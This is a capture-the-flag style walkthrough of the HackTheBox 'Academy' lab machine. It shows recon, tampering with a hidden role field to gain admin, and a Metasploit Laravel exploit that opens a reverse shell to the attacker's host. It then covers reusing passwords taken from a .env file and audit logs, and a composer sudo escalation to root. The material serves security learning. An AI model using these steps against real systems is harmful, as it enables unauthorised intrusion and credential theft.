Categories
HackTheBox Writeups

[HTB] – Academy

Today's write-up is on Academy, an easy HackTheBox box, created to promote the new academy section of the pentest learning platform.

Recon

As usual, I performed a Nmap scan for starters.

┌──(leo㉿kali)-[~/Desktop/HackTheBox/Academy]
└─$ nmap -p- -T4 -A 10.10.10.215 | tee scan.nmap

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-05 13:14 GMT
Nmap scan report for 10.10.10.215
Host is up (0.036s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
|   256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_  256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT      ADDRESS
1   35.77 ms 10.10.14.1
2   35.82 ms 10.10.10.215

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.61 seconds
  • -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
  • -p- : nmap scans every port
  • -T4 : allows you to adjust the Timing Template (according to your bandwidth, and the speed you're seeking)

Nothing to fancy here. I then fuzzed the website to uncover potentially interesting endpoints. Same thing here, for some reason, nothing was discovered.

┌──(leo㉿kali)-[~/Desktop/HackTheBox/Academy]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://10.10.10.215" | tee directories.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.215
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/05 13:20:52 Starting gobuster
===============================================================
/academy (Status: 301)
/server-status (Status: 403)
===============================================================
2020/12/05 13:34:34 Finished
===============================================================

When exploring the website, you'll get to pages, a registering form, and a login form.

After registering and login in, we get a regular HackTheBox website, looks good, but actually empty.

If you take a closer look at the source code, and in particular the one of the registering form :

You probably noticed the input field of type "hidden". Its name is "roleid" and its value is "0". So what we can understand here, is that as we POST our request to create an account, an invisible field is systematically filled for us with the value 0, which determines our role, and therefore the rights we have.

Let's try to create an account with a different roleid. Fire up Burpsuite, and fill out the registration form. If your proxy is correctly set up to work with Burpsuite, you should be able to intercept the request. You should see the information you entered, and our clandestine parameter set to "0".

Now just change the roleid to 1 and forward the request. You can then turn off the interception.

I at first expected to see a different interface when logging in, but... not what happened. I tried to create accounts with a few other roleid, but I got the same results. I finally found what to do with my account. There is actually a http://academy.htb/admin.php which looks like the regular connection form. I have no idea why it didn't show up on the Gobuster scan though.

If you log in with an account which roleid is set to "1" you should get to the following page :

There are two interesting pieces of information here : first, we have two strings that look like usernames (cry0l1t3 and mrb3n), second, and subdomain (dev-staging-01.academy.htb).

Don't forget to add this domain to your /etc/hosts file along with the academy.htb domain.

Lets see what to find over there :

It looks like some error log interface. Regardless of its primary use, it provides us with a lot of information about the environment the web application is running in. After taking a look at all this variables, I stumbled on something I din't know : "Laravel".

Laravel is a free, open-source PHP web framework, created by Taylor Otwell and intended for the development of web applications following the model–view–controller architectural pattern and based on Symfony.

- Google, your best friend when it comes to (almost) any IT matter

I said that it in my HackTheBox Beginner guide, but if you have a doubt on any technology you encounter, just search for "keyword exploit". It really often gives a pretty good idea of if you're on the right path.

If you try it on Laravel, you'll see there is a Metasploit exploit for this PHP framework. If you are not familiar with the Metasploitable framework, that's okay, just follow the next steps, and I'll try to keep it simple. (I will maybe write an article on the basic use of Metasploit... hold that thought).

Foothold using Metasploit

First, you should start Metasploit.

sudo msfdb init && msfconsole

Then let's look for our exploit.

msf6 > search laravel

Matching Modules
================

   #  Name                                              Disclosure Date  Rank       Check  Description
   -  ----                                              ---------------  ----       -----  -----------
   0  exploit/unix/http/laravel_token_unserialize_exec  2018-08-07       excellent  Yes    PHP Laravel Framework token Unserialize Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/http/laravel_token_unserialize_exec

We got only one result here. Select the exploit by typing use 0. Finally, we have to enter the correct settings to configure the exploit correctly and get a shell. It took some tries to get it to work because I wasn't understanding the role of the newfound domain in this business.

Here is the list of commands you should type in :

  • set RHOSTS academy.htb
    • Indicates the host to send the attack on
  • set VHOST dev-staging-01.academy.htb
    • Specifies the virtual host (the second domain name running on the same server (more information here 😉 )
  • set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
    • The API key available in the environment information we've seen earlier.
  • set LHOST tun0
    • Sets the local host to your IP on the HackTheBox network (tun0 is your wireless interface when you run the HtB VPN, you can check it out with sudo ifconfig)

We're now ready to go. Just type in exploit to run the exploit, and you should get a shell. Don't hesitate to use the python pty module to get a proper looking shell prompt.

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.178:4444 
[*] Command shell session 1 opened (10.10.14.178:4444 -> 10.10.10.215:44258) at 2020-12-06 00:43:29 +0000

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python3 -c "import pty;pty.spawn('/bin/bash')"
[email protected]:/var/www/html/htb-academy-dev-01/public$

Own User

The first step in enumeration for me is to check the users we have and locate the one who has the rights over the user.txt file (that's why we're here remember 😉 )

A simple ls /home will confirm our previous theory that we found to users : cry0l1t3 and mrb3n.

If you do ls -la /home/cry0l1t3, you should see the user.txt file. cry0l1t3 is the user we want to privesc to.

After some basic and boring hand enumeration, I found the /var/www/html/academy/.env file, which content reminds of the information we had at dev-staging-01.academy.htb. Nevertheless, its slightly different, and one line stands out :

...
DB_PASSWORD=mySup3rP4s5w0rd!!
...

When getting a password like this, I usually start trying it out for every user, starting with the ones I have an interest in.

[email protected]:/var/www/html/academy$ su cry0l1t3
su cry0l1t3
Password: mySup3rP4s5w0rd!!

$ id
id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
$ 

Nice ! We can now read the user.txt file !

In addition to that, these credentials work for ssh login. So if you want to take a break and come back later, you don't have to use Metasploit to get back to this point. Just use :

ssh [email protected]

Own Root

This part is easy if you get that you have to login as mrb3n before becoming root. The hint was once again the dev-staging-01.academy.htb page.

Files you should always check are backup files and action logs. If you navigate to /var/log you'll see (among other things) an audit folder. The auditd is a daemon that monitors certain activities, following rules. Here is a short introduction to this tool.

If you take a look at the syntax of the log, you'll notice that there is a comm="command" parameter. One way to get a password is by checking is there is any log concerning someone using the su command (used to login as a certain user).

In the /var/log/audit folder :

cat * | grep 'comm="su'
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A

Find yourself an online Hexa to Ascii converter, to read the data.

Let's try [email protected]! with mrb3n :

$ su mrb3n
Password: [email protected]!

$ id
id
uid=1001(mrb3n) gid=1001(mrb3n) groups=1001(mrb3n)

Nice ! The end is pretty straightforward. Check what the user can execute as root without a password.

$ sudo -l
sudo -l
[sudo] password for mrb3n: [email protected]!

Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

A quick search on GTFOBins gives us the set of commands to use to get a root shell using the /usr/bin/composer binary.

$ TF=$(mktemp -d)
TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
id
uid=0(root) gid=0(root) groups=0(root)

And rooted ! A nice box to start out, and learn about the basics of enumeration and privilege escalation. Hope you enjoyed ^^